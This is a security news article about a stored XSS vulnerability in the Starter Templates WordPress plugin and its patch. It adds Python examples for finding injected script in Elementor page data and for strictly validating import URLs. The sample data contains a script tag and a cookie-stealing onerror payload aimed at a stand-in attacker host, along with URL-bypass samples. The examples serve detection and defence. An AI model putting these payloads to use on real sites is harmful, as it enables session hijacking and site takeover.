
The Starter Templates — Elementor, Gutenberg, and Beaver Builder Templates plugin, published by the authors of the Astra WordPress theme, contains a vulnerability that affects over a million websites. An attacker can exploit it to plant malicious scripts on the site, escalate to a complete site takeover, and attack visitors of the vulnerable website.
Elementor, Gutenberg, and Beaver Builder Starter Templates
Brainstorm Force, the creators of the wildly popular Astra WordPress theme, publish the Starter Templates plugin. The plugin gives users access to over 280 ready-made WordPress site templates that speed up building a website.
The templates have been designed to work with Elementor, Gutenberg, Brizy, and Beaver Builder, as well as the Astra theme.
Over a million websites have the plugin installed.
Stored Cross-Site Scripting (XSS) Vulnerability
Wordfence security researchers discovered a vulnerability in the Brainstorm Force Starter Templates plugin that allows an attacker to inject a malicious script which is then stored on the website itself.
Because the injected script is stored on the server of the attacked site rather than delivered in a single crafted link, a stored XSS vulnerability is especially troublesome: it fires for every visitor who loads the affected page.
On their website, the non-profit Open Web Application Security Project (OWASP) describes the gravity of this type of XSS vulnerability:
“Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc.
The victim then retrieves the malicious script from the server when it requests the stored information.”
Attacks on Website Visitors and Website Takeover
The vulnerability could result in a complete site takeover, and the vulnerable website could be used to launch attacks on all of its visitors.
According to a Wordfence report:
“An attacker could craft and host a block containing malicious JavaScript on a server they controlled, and then use it to overwrite any post or page…
Any post or page that had been built with Elementor, including published pages, could be overwritten by the imported block, and the malicious JavaScript in the imported block would then be executed in the browser of any visitors to that page.
This could be used to redirect site visitors to malicious websites, or hijack an administrator’s session in order to create a new malicious administrator or add a backdoor to the site, leading to site takeover.”
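The last two sentences of the Wordfence description also tell an incident responder what to look for after the fact: whether an imported block has left script in a page's stored Elementor data. The following is an added example, not code from Wordfence or the plugin. It walks the JSON tree that Elementor keeps in the `_elementor_data` post meta (nested elements, each with an `id`, `elType`/`widgetType` and a `settings` object, as assumed here) and flags setting values that carry inline script, event-handler attributes, `javascript:` URLs or iframes. The sample page data, the widget setting names and the post ID are constructed for the demonstration.

```python
"""Hunt for injected script in stored Elementor page data.

Added example, not code from Wordfence or the Starter Templates plugin.
Assumes Elementor's `_elementor_data` post meta holds a JSON array of nested
elements, each with "id", "elType" (and "widgetType" for widgets),
"settings" and child "elements". Sample data below is constructed.
"""
import json
import re

# Indicators of client-side code that a stored XSS payload typically relies on.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"[\s\"']on[a-z]+\s*=", re.I),
    "javascript_url": re.compile(r"javascript\s*:", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
}


def _iter_strings(value, path=""):
    """Yield (dotted_path, string) for every string nested in a settings value."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for k, v in value.items():
            yield from _iter_strings(v, f"{path}.{k}" if path else str(k))
    elif isinstance(value, list):
        for i, v in enumerate(value):
            yield from _iter_strings(v, f"{path}[{i}]")


def scan_elementor_data(post_id: int, data_json: str) -> list:
    """Return one finding per (element, setting, indicator) hit in a page's data."""
    findings = []

    def walk(elements, trail):
        for el in elements:
            el_trail = trail + [el.get("id", "?")]
            for setting_path, text in _iter_strings(el.get("settings", {})):
                for name, rx in INDICATORS.items():
                    if rx.search(text):
                        findings.append({
                            "post_id": post_id,
                            "element": "/".join(el_trail),
                            "widget": el.get("widgetType") or el.get("elType"),
                            "setting": setting_path,
                            "indicator": name,
                            "excerpt": text[:80],
                        })
            walk(el.get("elements", []), el_trail)

    walk(json.loads(data_json), [])
    return findings


# Constructed sample: one clean heading widget and two HTML widgets of the
# kind an attacker-hosted block could have written into the page.
SAMPLE_ELEMENTOR_DATA = json.dumps([
    {"id": "a1", "elType": "section", "settings": {}, "elements": [
        {"id": "b2", "elType": "column", "settings": {}, "elements": [
            {"id": "c3", "elType": "widget", "widgetType": "heading",
             "settings": {"title": "Welcome to our store"}, "elements": []},
            {"id": "c4", "elType": "widget", "widgetType": "html",
             "settings": {"html": '<script src="https://evil.example/hijack.js"></script>'},
             "elements": []},
            {"id": "c5", "elType": "widget", "widgetType": "html",
             "settings": {"html": "<img src=x onerror=\"fetch('https://evil.example/?c='+document.cookie)\">"},
             "elements": []},
        ]},
    ]},
])


if __name__ == "__main__":
    for f in scan_elementor_data(42, SAMPLE_ELEMENTOR_DATA):
        print(f"post {f['post_id']} {f['element']} [{f['widget']}] "
              f"{f['setting']}: {f['indicator']} -> {f['excerpt']}")
```

To run this against a real site, feed it each row of `SELECT post_id, meta_value FROM wp_postmeta WHERE meta_key = '_elementor_data'` (table prefix as configured for the site). Hits in the HTML widget are the most likely place for an imported payload, but the walker deliberately checks every string setting, since link fields and custom attributes can carry `javascript:` URLs just as well.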
Starter Templates Plugin Has Been Patched
Wordfence notified the Starter Templates plugin’s publishers of the vulnerability, and the plugin was promptly patched in version 2.7.1.
The patch is accurately recorded in the Starter Templates plugin’s public changelog:
v2.7.1 – 7-October-2021
– Security Improvement: Validate the site URL before processing the import request.
– Security Improvement: Updated right file upload permission before importing images.
An honest changelog, such as the one published by Brainstorm Force, is a sign of a good publisher, and it’s great to see them being open about addressing security issues.
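What "validate the site URL before processing the import request" means in practice, as an added example that is not the plugin's own code: an import endpoint that fetches a block from a caller-supplied URL and stores the result on the site must accept only URLs that point at the vendor's template server, and a substring check is not enough. The allowlisted host `templates.example.com`, the attacker URLs and the injected `fetch` callback are assumptions made for the demonstration; the logic is shown in Python rather than the plugin's PHP.

```python
"""Strict allowlisting of the source URL for a remote block import.

Added example, not code from the Starter Templates plugin. It models the
check behind the changelog entry "Validate the site URL before processing
the import request". Host name, sample URLs and the fetch callback are
assumptions for the demonstration.
"""
from urllib.parse import urlsplit

# Assumed: the only server a block import may ever be fetched from.
ALLOWED_IMPORT_HOST = "templates.example.com"


def naive_is_allowed(url: str) -> bool:
    """A substring test, shown only to demonstrate why it is insufficient:
    it accepts any URL that mentions the trusted host somewhere."""
    return ALLOWED_IMPORT_HOST in url


def is_allowed_import_url(url: str) -> bool:
    """Accept only https URLs whose host is exactly the allowlisted server,
    with no embedded credentials and no explicit port."""
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return False
    if parts.scheme != "https":
        return False
    # .hostname is lower-cased and excludes any "user:pass@" prefix and port,
    # so "https://templates.example.com@evil.example/" yields "evil.example".
    if parts.hostname != ALLOWED_IMPORT_HOST:
        return False
    if parts.username is not None or parts.password is not None or port is not None:
        return False
    return True


def import_block(requested_url: str, fetch) -> str:
    """Mimic the import handler: refuse before any network access happens.

    `fetch` is injected (a callable taking the URL and returning the block
    markup) so the example runs offline; a plugin would call its HTTP client here.
    """
    if not is_allowed_import_url(requested_url):
        raise PermissionError(f"refused import from untrusted URL: {requested_url}")
    return fetch(requested_url)


# Constructed attacker-controlled URLs. Every one of them passes the naive
# substring check; none of them passes the strict check.
ATTACK_URLS = [
    "https://evil.example/templates.example.com/block.json",   # trusted name in the path
    "https://templates.example.com.evil.example/block.json",   # trusted name as a subdomain
    "https://templates.example.com@evil.example/block.json",   # trusted name as userinfo
    "http://templates.example.com/block.json",                 # plaintext downgrade
]
GOOD_URL = "https://templates.example.com/blocks/hero.json"


def compare_checks() -> dict:
    """Return {url: (naive_result, strict_result)} for the sample URLs."""
    return {u: (naive_is_allowed(u), is_allowed_import_url(u)) for u in ATTACK_URLS + [GOOD_URL]}


if __name__ == "__main__":
    for url, (naive, strict) in compare_checks().items():
        print(f"naive={naive!s:5} strict={strict!s:5} {url}")
    fake_fetch = lambda url: "<div>trusted block markup</div>"  # stands in for the HTTP fetch
    print(import_block(GOOD_URL, fake_fetch))
    try:
        import_block(ATTACK_URLS[2], fake_fetch)
    except PermissionError as exc:
        print(exc)
```

The check runs before the fetch, so a rejected URL never reaches the HTTP client, and the imported markup is still untrusted input that should be sanitized on the way into the database even when it comes from the allowlisted host.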
Wordfence Recommends Publishers Update Their Plugin
Wordfence recommends that all site owners who use this plugin update to the most recent version, 2.7.5, which carries the security fix introduced in 2.7.1 along with later bug fixes.